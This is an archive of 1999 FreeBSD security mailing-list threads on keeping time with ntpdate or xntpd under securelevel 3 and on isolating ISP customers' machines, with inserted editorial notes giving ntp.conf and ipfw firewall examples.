Subject: Re: Securelevel 3 ant setting time

"Maybe". (Probably?)

When ntpdate sees a small time delta (less than 1/2 second off), it will use
the adjtime() call to slew the clock time, which is permitted. However, if the
delta is large for some reason, then it will go in and use the sledgehammer
approach - settimeofday().

From the ntpdate manpage:

    The latter technique is less disruptive and more accurate when the offset
    is small, and works quite well when ntpdate is run by cron(8) every hour
    or two.

So, you'll probably be OK doing it that way, *but* if you get too far off
during the time period, then you won't be able to correct for it.

-Dave

Lo and Behold, Brett Glass said:
> My server uses a cron job and ntpupdate to grab the time from the
> best of several accurate government servers. Would securelevel 3 allow
> this?

--
work: danderse@cs.utah.edu                     me: angio@pobox.com
University of Utah CS Department             http://www.angio.net/
"If you haul a geek up a crack, you will bloody their fingers for a day...
 If you teach a geek to climb, you will bloody their fingers for life."
--
Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Fri Aug 20 3:04:08 1999
Message-Id: <4.2.0.58.19990820035954.04757b80@localhost>
Date: Fri, 20 Aug 1999 04:03:42 -0600
To: Doug
From: Brett Glass
Subject: Re: Securelevel 3 ant setting time
Cc: Archie Cobbs, Lowkrantz Goran, "'freebsd-security@FreeBSD.ORG'"
References: <4.2.0.58.19990819161554.04790800@localhost>

At 04:14 PM 8/19/99 -0700, Doug wrote:

> If you're going to do this anyway, why not just use xntpd? It's
>more reliable, has better mechanisms to resolve the skew between your
>various time sources, and will keep your clock within the range of
>adjustments that are allowable in securelevel 3.

I looked at the man page for xntpd once, and walked away (well, VIRTUALLY
walked away) scratching my head. It was totally opaque.
There was no simple information about how to synchronize with the NIST every so
often; also, it appeared that one needed to leave a large, expensive daemon
running all the time. So, I went with ntpdate, which was simple and easy to
understand (and which got out of the way after it adjusted the clock). The
system with the worst clock drifts no more than 5 minutes every 12 hours -- and
that, I suspect, is mainly due to busy-waits with interrupts off in the ATAPI
driver.

--Brett

From owner-freebsd-security Fri Aug 20 8:26:02 1999
Message-ID: <37BD7381.80939A1@softweyr.com>
Date: Fri, 20 Aug 1999 09:25:53 -0600
From: Wes Peters
Organization: Softweyr LLC
To: Brett Glass
Cc: Doug, Archie Cobbs, Lowkrantz Goran, "'freebsd-security@FreeBSD.ORG'"
Subject: Re: Securelevel 3 ant setting time
References: <4.2.0.58.19990819161554.04790800@localhost> <4.2.0.58.19990820035954.04757b80@localhost>

Brett Glass wrote:
>
> At 04:14 PM 8/19/99 -0700, Doug wrote:
>
> > If you're going to do this anyway, why not just use xntpd? It's
> >more reliable, has better mechanisms to resolve the skew between your
> >various time sources, and will keep your clock within the range of
> >adjustments that are allowable in securelevel 3.
>
> I looked at the man page for xntpd once, and walked away (well,
> VIRTUALLY walked away) scratching my head. It was totally opaque.
> There was no simple information about how to synchronize with the NIST
> every so often; also, it appeared that one needed to leave a large,
> expensive daemon running all the time.

Yes, you have to leave the daemon running. At 140K text, it's not all that
large. If you want to customize it and throw out all the clock drivers you
won't be using, it would probably cut the size by half.

You have to leave the daemon running because it is a lot smarter about updating
the clock than you are. It will update it more often when it has to, until it
gets the clock tuned to where it is mostly accurate, then slow down its rate of
adjustment once your clock is not drifting too far. Even on systems where the
clock isn't very good, it usually only takes a few hours for ntp to get it
close, and then it only has to tickle it once or twice an hour.

> So, I went with ntpdate, which
> was simple and easy to understand (and which got out of the way after
> it adjusted the clock). The system with the worst clock drifts no more
> than 5 minutes every 12 hours -- and that, I suspect, is mainly due to
> busy-waits with interrupts off in the ATAPI driver.

Using ntpdate, if your clock isn't very accurate, it will never become
accurate, because ntpdate doesn't adjust the clock RATE, just the current time
setting. It is solving an entirely different problem.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                  Softweyr LLC
http://softweyr.com/                                   wes@softweyr.com

From owner-freebsd-security Fri Aug 20 8:52:38 1999
In-Reply-To: <4.2.0.58.19990820035954.04757b80@localhost>
Date: Fri, 20 Aug 1999 11:52:04 -0400 (EDT)
From: Will Andrews
To: Brett Glass
Subject: Re: Securelevel 3 ant setting time
Cc: "freebsd-security@FreeBSD.ORG"

On 20-Aug-99 Brett Glass wrote:
> I looked at the man page for xntpd once, and walked away (well,
> VIRTUALLY walked away) scratching my head. It was totally opaque.
> There was no simple information about how to synchronize with the NIST
> every so often; also, it appeared that one needed to leave a large,
> expensive daemon running all the time. So, I went with ntpdate, which
> was simple and easy to understand (and which got out of the way after
> it adjusted the clock). The system with the worst clock drifts no more
> than 5 minutes every 12 hours -- and that, I suspect, is mainly due to
> busy-waits with interrupts off in the ATAPI driver.
Simple xntpd:

    # echo "server time.nist.gov" > /etc/ntp.conf
    # echo "driftfile /etc/ntp.drift" >> /etc/ntp.conf
    # echo "xntpd_enable=\"YES\"" >> /etc/rc.conf
    # echo "xntpd_flags=\"-c /etc/ntp.conf -p /var/run/xntpd.pid\"" >> /etc/rc.conf
    # xntpd -c /etc/ntp.conf -p /var/run/xntpd.pid

This will suit most people. However, you should also have ntp in your
syslog.conf and /var/log/ntp.log should exist. See the syslog.conf(5) manpage,
read about "facilities".

Xntpd is not that difficult. Unlike ntpdate, it can update your system clock
while also acting as a time server for your local network, reducing bandwidth
costs (yes, minimal, if you have a very small network, but still worth time and
money.) It is also more reliable and far more featureful than ntpdate (hey,
encryption compensation!).

As for "large, expensive daemon", that is incorrect. xntpd barely takes 1MB of
total RAM on my machine, and usually close to zero CPU.

--
Will Andrews

From owner-freebsd-security Fri Aug 20 9:29:10 1999
Message-ID: <37BD81C7.46F9F9E3@gorean.org>
Date: Fri, 20 Aug 1999 09:26:47 -0700
From: Doug
Organization: Triborough Bridge & Tunnel Authority
To: Brett Glass
Cc: Archie Cobbs, Lowkrantz Goran, "'freebsd-security@FreeBSD.ORG'"
Subject: Re: Securelevel 3 ant setting time
References: <4.2.0.58.19990819161554.04790800@localhost> <4.2.0.58.19990820035954.04757b80@localhost>

Brett Glass wrote:
>
> At 04:14 PM 8/19/99 -0700, Doug wrote:
>
> > If you're going to do this anyway, why not just use xntpd? It's
> >more reliable, has better mechanisms to resolve the skew between your
> >various time sources, and will keep your clock within the range of
> >adjustments that are allowable in securelevel 3.
>
> I looked at the man page for xntpd once, and walked away (well,
> VIRTUALLY walked away) scratching my head. It was totally opaque.

Yeah, I admit it's pretty dense stuff. However once you get a feel for it IMO
it's one of the more amazing pieces of software on the 'net. Take a look at
http://www.eecis.udel.edu/~ntp/, and especially the list of public stratum 3
servers. It's generally considered rude to synch a workstation to a stratum 1
or 2 server, and you won't notice the few milliseconds difference anyway. Once
you have a list of 4 or 5 servers that have good (and diverse) network topology
to your site, put them in an ntp.conf file like this:

    server best.or.closest.site prefer
    server second.best.site
    server third.best.site
    server etc....
    driftfile /etc/ntp.drift

And you're done. Fire up xntpd and it will start synching your clock. In your
/etc/rc.conf enable ntpdate and xntpd and put in the first server on your list
as the flag argument to ntpdate. Overall you will probably find that the system
load is less with xntpd because it does its job more slowly, and keeps the
clock closer in synch.

Here are some figures to contrast with on my P5 150 system that's been up for
two weeks:

      UID PRI  NI  VSZ  RSS        TIME COMMAND
        0  18   0    0    0    10:09.23 (syncer)
        0   2   0  568  400     4:53.42 /sbin/natd -dynamic -n ep0
        0   2 -12 1032  648     3:26.28 xntpd -p /var/run/xntpd.pid
        0   2   0 1472  968     1:43.72 /usr/local/sbin/httpd
    65534  99   0  816  488 12386:31.83 /usr/local/distributed.net/rc5des -quiet

Hope this helps,

Doug

From owner-freebsd-security Fri Aug 20 9:55:03 1999
To: Doug
Cc: Brett Glass, Archie Cobbs, Lowkrantz Goran, "'freebsd-security@FreeBSD.ORG'"
Subject: Re: Securelevel 3 ant setting time
In-reply-to: Your message of "Fri, 20 Aug 1999 09:26:47 PDT." <37BD81C7.46F9F9E3@gorean.org>
Date: Fri, 20 Aug 1999 18:52:52 +0200
Message-ID: <4547.935167972@critter.freebsd.dk>
From: Poul-Henning Kamp

In message <37BD81C7.46F9F9E3@gorean.org>, Doug writes:
>>
>> I looked at the man page for xntpd once, and walked away (well,
>> VIRTUALLY walked away) scratching my head. It was totally opaque.
>
> Yeah, I admit it's pretty dense stuff. However once you get a feel for it
>IMO it's one of the more amazing pieces of software on the 'net. Take a
>look at http://www.eecis.udel.edu/~ntp/, and especially the list of public
>stratum 3 servers.
> It's generally considered rude to synch a workstation to
> a stratum 1 or 2 server, and you won't notice the few milliseconds
> difference anyway. Once you have a list of 4 or 5 servers that have good
> (and diverse) network topology to your site, put them in a ntp.conf file
> like this:

Actually, 4 or 5 is too many, it encourages xntpd to switch too often,
three seems to be the best and most stable conf.

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Aug 20 11:31: 0 1999
Delivered-To: freebsd-security@freebsd.org
Received: from finland.ispro.net.tr (finland.ispro.net.tr [195.174.18.1]) by hub.freebsd.org (Postfix) with ESMTP id B277E14F19 for ; Fri, 20 Aug 1999 11:30:54 -0700 (PDT) (envelope-from yurtesen@ispro.net.tr)
Received: from ispro.net.tr (dyn-0-095.tku.netti.fi [195.16.223.96]) by finland.ispro.net.tr (8.9.3/8.9.3) with ESMTP id VAA69385 for ; Fri, 20 Aug 1999 21:29:34 +0300 (EEST) (envelope-from yurtesen@ispro.net.tr)
Message-ID: <37BD9E40.7B95E73E@ispro.net.tr>
Date: Fri, 20 Aug 1999 21:28:16 +0300
From: Evren Yurtesen
X-Mailer: Mozilla 4.51 [en] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: multiple machines in the same network
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello,

We are an ISP and we want to let our customers put their own hardware
into our network. But the thing we are concerned about is security of
course. How can we protect our system from customers' machines?

I have heard about something called "virtual network" but I am not sure
of what it means and even if it is the thing I am searching for?

thanks!
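Editorial note, placed here between the messages of the archive and not written by any poster: the ntp.conf below combines Doug's template with Poul-Henning Kamp's point that three servers are more stable than four or five, and adds the access-control lines the thread does not mention. Server addresses and the interface to a securelevel 3 boot are assumptions; replace 192.0.2.x with the stratum 2 or 3 servers nearest to you (your ISP's, ideally).

```conf
# /etc/ntp.conf for a workstation that only consumes time.
# Editorial example; 192.0.2.10/20/30 are placeholder server addresses.
server 192.0.2.10 prefer      # nearest stratum 2/3 server, also used by ntpdate at boot
server 192.0.2.20
server 192.0.2.30
driftfile /etc/ntp.drift

# Access control: by default ignore every packet from every address...
restrict default ignore
# ...except the three configured servers, which may send us time but may not
# query, reconfigure, or set traps on this daemon.
restrict 192.0.2.10 nomodify notrap noquery
restrict 192.0.2.20 nomodify notrap noquery
restrict 192.0.2.30 nomodify notrap noquery
# ntpq/xntpdc from this host itself stay unrestricted.
restrict 127.0.0.1

# /etc/rc.conf knobs that go with it (what Doug describes in words above):
#   ntpdate_enable="YES"
#   ntpdate_flags="192.0.2.10"
#   xntpd_enable="YES"
```

ntpdate steps the clock, which is exactly the kind of jump a raised securelevel restricts, so it runs at boot before /etc/rc raises kern.securelevel; from then on xntpd only slews, which stays within what securelevel 3 allows. `restrict default ignore` also means this host will not answer time or `ntpq` queries from the rest of the segment, which is what you want for a workstation; drop the `ignore` and keep `nomodify notrap noquery` if the machine is meant to serve time to others.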
Evren Yurtesen yurtesen@ispro.net.tr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 11:51:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 144961524E for ; Fri, 20 Aug 1999 11:51:49 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id LAA24136; Fri, 20 Aug 1999 11:37:00 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908201837.LAA24136@gndrsh.dnsmgr.net> Subject: Re: Securelevel 3 ant setting time In-Reply-To: from Will Andrews at "Aug 20, 1999 11:52:04 am" To: andrews@TECHNOLOGIST.COM (Will Andrews) Date: Fri, 20 Aug 1999 11:37:00 -0700 (PDT) Cc: brett@lariat.org (Brett Glass), freebsd-security@FreeBSD.ORG (freebsd-security@FreeBSD.ORG) X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On 20-Aug-99 Brett Glass wrote: > > I looked at the man page for xntpd once, and walked away (well, > > VIRTUALLY walked away) scratching my head. It was totally opaque. > > There was no simple information about how to synchronize with the NIST > > every so often; also, it appeared that one needed to leave a large, > > expensive daemon running all the time. So, I went with ntpdate, which > > was simple and easy to understand (and which got out of the way after > > it adjusted the clock). The system with the worst clock drifts no more > > than 5 minutes every 12 hours -- and that, I suspect, is mainly due to > > busy-waits with interrupts off in the ATAPI driver. 
> > Simple xntpd:
> >
> > # echo "server time.nist.gov" > /etc/ntp.conf

Please attempt to find a local lower stratum 2 or 3 clock closer to you
network-wise. Call your ISP and ask if they have xntpd running some place,
>50% of them do. You'll get less jitter over a shorter set of network hops.
It also reduces the very small load on the large stratum 1 clocks.

Please read the xntpd FAQ. You should always check it for the closest
public ntp server.

--
Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.dnsmgr.net

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Aug 20 11:55:16 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id E633A15362 for ; Fri, 20 Aug 1999 11:55:13 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net)
Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id LAA24307; Fri, 20 Aug 1999 11:52:19 -0700 (PDT) (envelope-from freebsd)
From: "Rodney W. Grimes"
Message-Id: <199908201852.LAA24307@gndrsh.dnsmgr.net>
Subject: Re: multiple machines in the same network
In-Reply-To: <37BD9E40.7B95E73E@ispro.net.tr> from Evren Yurtesen at "Aug 20, 1999 09:28:16 pm"
To: yurtesen@ispro.net.tr (Evren Yurtesen)
Date: Fri, 20 Aug 1999 11:52:18 -0700 (PDT)
Cc: freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL54 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Hello,
>
> We are an ISP and we want to let our customers put their own hardware
> into our network. But the thing we are concerned about is security of
> course. How can we protect our system from customers' machines?

I would strongly suggest that you place your customers on an ethernet
switch. Any of the modern 10/100 switches work well for this.
Each customer gets 1 port on the switch, if they have more than 1 machine
they install their own hub connected to the switch. This prevents them
from sniffing other customers' traffic. Then you need to set up a router
between this switch and your DMZ with a firewall rule set that stops all
the nasty stuff like RFC1918 nets, smurf amplifier (block the broadcast
addresses to all known subnets), etc.

>
> I have heard about something called "virtual network" but I am not sure
> of what it means and even if it is the thing I am searching for?

You don't need VLANs for this, it's overkill.

--
Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.dnsmgr.net

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Aug 20 12:31:56 1999
Delivered-To: freebsd-security@freebsd.org
Received: from web601.yahoomail.com (web1206.mail.yahoo.com [128.11.23.142]) by hub.freebsd.org (Postfix) with SMTP id 5F75814CA1 for ; Fri, 20 Aug 1999 12:31:54 -0700 (PDT) (envelope-from service_account@yahoo.com)
Message-ID: <19990820192825.15974.rocketmail@web601.yahoomail.com>
Received: from [15.255.160.64] by web1206.mail.yahoo.com; Fri, 20 Aug 1999 12:28:25 PDT
Date: Fri, 20 Aug 1999 12:28:25 -0700 (PDT)
From: jay d
Subject: Re: multiple machines in the same network
To: "Rodney W. Grimes" , Evren Yurtesen
Cc: freebsd-security@FreeBSD.ORG
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

What you really want is a VLAN capable switch. VLAN switches simply
designate what ports on a switch can see what other ports on the same
switch. I have to correct you though, Rodney, as sniffing is currently
possible through switches.

Jay

--- "Rodney W. Grimes" wrote:
> > Hello,
> >
> > We are an ISP and we want to let our customers to
> put their own hardware
> > into our network.
But the thing we are concerned > about is security of > > course. How can we protect our system from > customers' machines? > > I would strongly suggest that you place your > customers on a ethernet > switch. Any of the modern 10/100 switches work well > for this. Each > customer gets 1 port on the switch, if they have > more than 1 machine > they install thier own hub connected to the switch. > This prevents > them from sniffing other customers traffic. Then > you need to setup > a router between this switch and your DMZ with a > firewall rule set > that stops all the nasty stuff like RFC1918 nets, > smurf amplifier (block > the broadcast addresses to all known subnets), etc. > > > > > I have heard about somehthing called "virtual > network" but I am not sure > > of what it means and even if it is the thing I am > searching for ? > > You don't need VLAN's for this, it's overkill. > > -- > Rod Grimes - KD7CAX - (RWG25) > rgrimes@gndrsh.dnsmgr.net > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message > > __________________________________________________ Do You Yahoo!? Bid and sell for free at http://auctions.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 12:35:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from saturn.terahertz.net (saturn.terahertz.net [209.83.5.170]) by hub.freebsd.org (Postfix) with ESMTP id 1D91B15699 for ; Fri, 20 Aug 1999 12:35:14 -0700 (PDT) (envelope-from mustang@TeraHertz.Net) Received: from localhost (mustang@localhost) by saturn.terahertz.net (8.9.3/8.9.3) with ESMTP id OAA93439; Fri, 20 Aug 1999 14:33:26 -0500 (CDT) Date: Fri, 20 Aug 1999 14:33:25 -0500 (CDT) From: Chris Malayter To: jay d Cc: "Rodney W. 
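Editorial note, not part of any message in this thread: Rod Grimes' advice above (a router with a rule set between the customer switch and the DMZ that drops RFC1918 space and directed broadcasts) translated into an ipfw fragment of the kind that goes in /etc/rc.firewall. The interface name fxp1, the customer prefix 198.51.100.0/24 and the two broadcast addresses are placeholders; the ingress source filter in the first rule is an addition the thread does not spell out.

```sh
# Fragment for /etc/rc.firewall on the router between the customer switch
# and the DMZ. Editorial example; fxp1, 198.51.100.0/24 and the broadcast
# addresses below are placeholders for your own interface and subnets.
fwcmd="/sbin/ipfw"
cust_if="fxp1"                # port facing the customer switch
cust_net="198.51.100.0/24"    # the prefix your customers are assigned from

# Ingress filtering (RFC 2267): a packet entering from the customer port
# that does not carry a customer source address is spoofed. Drop and log it.
${fwcmd} add 1000 deny log ip from not ${cust_net} to any in via ${cust_if}

# RFC 1918 space must never cross the customer port, as source or as
# destination. "via" matches the interface in both directions.
${fwcmd} add 1100 deny ip from 10.0.0.0/8     to any via ${cust_if}
${fwcmd} add 1100 deny ip from 172.16.0.0/12  to any via ${cust_if}
${fwcmd} add 1100 deny ip from 192.168.0.0/16 to any via ${cust_if}
${fwcmd} add 1100 deny ip from any to 10.0.0.0/8     via ${cust_if}
${fwcmd} add 1100 deny ip from any to 172.16.0.0/12  via ${cust_if}
${fwcmd} add 1100 deny ip from any to 192.168.0.0/16 via ${cust_if}

# Smurf amplification: nothing may target the broadcast address of a subnet
# you know about. Repeat for every subnet you route.
${fwcmd} add 1200 deny log ip from any to 198.51.100.255 via ${cust_if}
${fwcmd} add 1200 deny log ip from any to 203.0.113.255  via ${cust_if}
```

The rule 1000 filter is what actually stops a customer box from being used to spoof third parties; if a customer legitimately routes a second prefix, add it to that rule rather than removing the rule. Logged rules should be rate limited (the kernel's IPFIREWALL_VERBOSE_LIMIT option, net.inet.ip.fw.verbose_limit) or a flood of spoofed packets turns into a flood of syslog. These rules complement, not replace, the per-port switch: the switch keeps customers from seeing each other's unicast traffic, the router keeps them from abusing the rest of the net.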
Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network In-Reply-To: <19990820192825.15974.rocketmail@web601.yahoomail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Care to elaborate on that? I'm in a colocated facility with multiple boxes that I am sure our root comprimised, if in fact you can sniff on a switched network, I'de like to know how you protect yourself against that? Chris Malayter Mustang@TeraHertz.Net ------------------------------------------------------------------------- Administrator, TeraHertz Communications | | | InterNIC CM3647 | Chief Engineer - 95.1 WVUR - Valparaiso,Indiana | | ------------------------------------------------------------------------- "Behavior is hard to change...but character is nearly impossible" On Fri, 20 Aug 1999, jay d wrote: > What you really want is a VLAN capable switch. VLAN switches simply > designate what ports on a switch can see what other ports on the same > switch. I have to correct you though, Rodney, as sniffing is currently > possible through switches. > > Jay > > --- "Rodney W. Grimes" wrote: > > > Hello, > > > > > > We are an ISP and we want to let our customers to > > put their own hardware > > > into our network. But the thing we are concerned > > about is security of > > > course. How can we protect our system from > > customers' machines? > > > > I would strongly suggest that you place your > > customers on a ethernet > > switch. Any of the modern 10/100 switches work well > > for this. Each > > customer gets 1 port on the switch, if they have > > more than 1 machine > > they install thier own hub connected to the switch. > > This prevents > > them from sniffing other customers traffic. 
Then > > you need to setup > > a router between this switch and your DMZ with a > > firewall rule set > > that stops all the nasty stuff like RFC1918 nets, > > smurf amplifier (block > > the broadcast addresses to all known subnets), etc. > > > > > > > > I have heard about somehthing called "virtual > > network" but I am not sure > > > of what it means and even if it is the thing I am > > searching for ? > > > > You don't need VLAN's for this, it's overkill. > > > > -- > > Rod Grimes - KD7CAX - (RWG25) > > rgrimes@gndrsh.dnsmgr.net > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of > > the message > > > > > > __________________________________________________ > Do You Yahoo!? > Bid and sell for free at http://auctions.yahoo.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 12:42: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from web601.yahoomail.com (web1204.mail.yahoo.com [128.11.23.140]) by hub.freebsd.org (Postfix) with SMTP id C0CFF156C7 for ; Fri, 20 Aug 1999 12:41:58 -0700 (PDT) (envelope-from service_account@yahoo.com) Message-ID: <19990820194238.29331.rocketmail@web601.yahoomail.com> Received: from [15.255.160.64] by web1204.mail.yahoo.com; Fri, 20 Aug 1999 12:42:38 PDT Date: Fri, 20 Aug 1999 12:42:38 -0700 (PDT) From: jay d Subject: Re: multiple machines in the same network To: Chris Malayter Cc: "Rodney W. Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org current project >:) i probably shouldn't have said that. jay --- Chris Malayter wrote: > Care to elaborate on that? 
I'm in a colocated > facility with multiple > boxes that I am sure our root comprimised, if in > fact you can sniff on a > switched network, I'de like to know how you protect > yourself against that? > > Chris Malayter > > > Mustang@TeraHertz.Net > > ------------------------------------------------------------------------- > Administrator, TeraHertz Communications | | > | InterNIC CM3647 | > Chief Engineer - 95.1 WVUR - Valparaiso,Indiana | > | > ------------------------------------------------------------------------- > > "Behavior is hard to change...but character is > nearly impossible" > > > On Fri, 20 Aug 1999, jay d wrote: > > > What you really want is a VLAN capable switch. > VLAN switches simply > > designate what ports on a switch can see what > other ports on the same > > switch. I have to correct you though, Rodney, as > sniffing is currently > > possible through switches. > > > > Jay > > > > --- "Rodney W. Grimes" > wrote: > > > > Hello, > > > > > > > > We are an ISP and we want to let our customers > to > > > put their own hardware > > > > into our network. But the thing we are > concerned > > > about is security of > > > > course. How can we protect our system from > > > customers' machines? > > > > > > I would strongly suggest that you place your > > > customers on a ethernet > > > switch. Any of the modern 10/100 switches work > well > > > for this. Each > > > customer gets 1 port on the switch, if they have > > > more than 1 machine > > > they install thier own hub connected to the > switch. > > > This prevents > > > them from sniffing other customers traffic. > Then > > > you need to setup > > > a router between this switch and your DMZ with a > > > firewall rule set > > > that stops all the nasty stuff like RFC1918 > nets, > > > smurf amplifier (block > > > the broadcast addresses to all known subnets), > etc. 
> > > > > > > > > > > I have heard about somehthing called "virtual > > > network" but I am not sure > > > > of what it means and even if it is the thing I > am > > > searching for ? > > > > > > You don't need VLAN's for this, it's overkill. > > > > > > -- > > > Rod Grimes - KD7CAX - (RWG25) > > > rgrimes@gndrsh.dnsmgr.net > > > > > > > > > To Unsubscribe: send mail to > majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body > of > > > the message > > > > > > > > > > __________________________________________________ > > Do You Yahoo!? > > Bid and sell for free at http://auctions.yahoo.com > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of > the message > > > > __________________________________________________ Do You Yahoo!? Bid and sell for free at http://auctions.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 12:47:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from saturn.terahertz.net (saturn.terahertz.net [209.83.5.170]) by hub.freebsd.org (Postfix) with ESMTP id 74CBE15699 for ; Fri, 20 Aug 1999 12:47:30 -0700 (PDT) (envelope-from mustang@TeraHertz.Net) Received: from localhost (mustang@localhost) by saturn.terahertz.net (8.9.3/8.9.3) with ESMTP id OAA94266; Fri, 20 Aug 1999 14:45:03 -0500 (CDT) Date: Fri, 20 Aug 1999 14:45:03 -0500 (CDT) From: Chris Malayter To: jay d Cc: "Rodney W. Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network In-Reply-To: <19990820194238.29331.rocketmail@web601.yahoomail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Too late? :) Spill the scoop. 
Chris Malayter Mustang@TeraHertz.Net ------------------------------------------------------------------------- Administrator, TeraHertz Communications | | | InterNIC CM3647 | Chief Engineer - 95.1 WVUR - Valparaiso,Indiana | | ------------------------------------------------------------------------- "Behavior is hard to change...but character is nearly impossible" On Fri, 20 Aug 1999, jay d wrote: > current project >:) i probably shouldn't have said that. > > jay > > --- Chris Malayter wrote: > > Care to elaborate on that? I'm in a colocated > > facility with multiple > > boxes that I am sure our root comprimised, if in > > fact you can sniff on a > > switched network, I'de like to know how you protect > > yourself against that? > > > > Chris Malayter > > > > > > Mustang@TeraHertz.Net > > > > > ------------------------------------------------------------------------- > > Administrator, TeraHertz Communications | | > > | InterNIC CM3647 | > > Chief Engineer - 95.1 WVUR - Valparaiso,Indiana | > > | > > > ------------------------------------------------------------------------- > > > > "Behavior is hard to change...but character is > > nearly impossible" > > > > > > On Fri, 20 Aug 1999, jay d wrote: > > > > > What you really want is a VLAN capable switch. > > VLAN switches simply > > > designate what ports on a switch can see what > > other ports on the same > > > switch. I have to correct you though, Rodney, as > > sniffing is currently > > > possible through switches. > > > > > > Jay > > > > > > --- "Rodney W. Grimes" > > wrote: > > > > > Hello, > > > > > > > > > > We are an ISP and we want to let our customers > > to > > > > put their own hardware > > > > > into our network. But the thing we are > > concerned > > > > about is security of > > > > > course. How can we protect our system from > > > > customers' machines? > > > > > > > > I would strongly suggest that you place your > > > > customers on a ethernet > > > > switch. 
Any of the modern 10/100 switches work > > well > > > > for this. Each > > > > customer gets 1 port on the switch, if they have > > > > more than 1 machine > > > > they install thier own hub connected to the > > switch. > > > > This prevents > > > > them from sniffing other customers traffic. > > Then > > > > you need to setup > > > > a router between this switch and your DMZ with a > > > > firewall rule set > > > > that stops all the nasty stuff like RFC1918 > > nets, > > > > smurf amplifier (block > > > > the broadcast addresses to all known subnets), > > etc. > > > > > > > > > > > > > > I have heard about somehthing called "virtual > > > > network" but I am not sure > > > > > of what it means and even if it is the thing I > > am > > > > searching for ? > > > > > > > > You don't need VLAN's for this, it's overkill. > > > > > > > > -- > > > > Rod Grimes - KD7CAX - (RWG25) > > > > rgrimes@gndrsh.dnsmgr.net > > > > > > > > > > > > To Unsubscribe: send mail to > > majordomo@FreeBSD.org > > > > with "unsubscribe freebsd-security" in the body > > of > > > > the message > > > > > > > > > > > > > > __________________________________________________ > > > Do You Yahoo!? > > > Bid and sell for free at http://auctions.yahoo.com > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of > > the message > > > > > > > > > __________________________________________________ > Do You Yahoo!? 
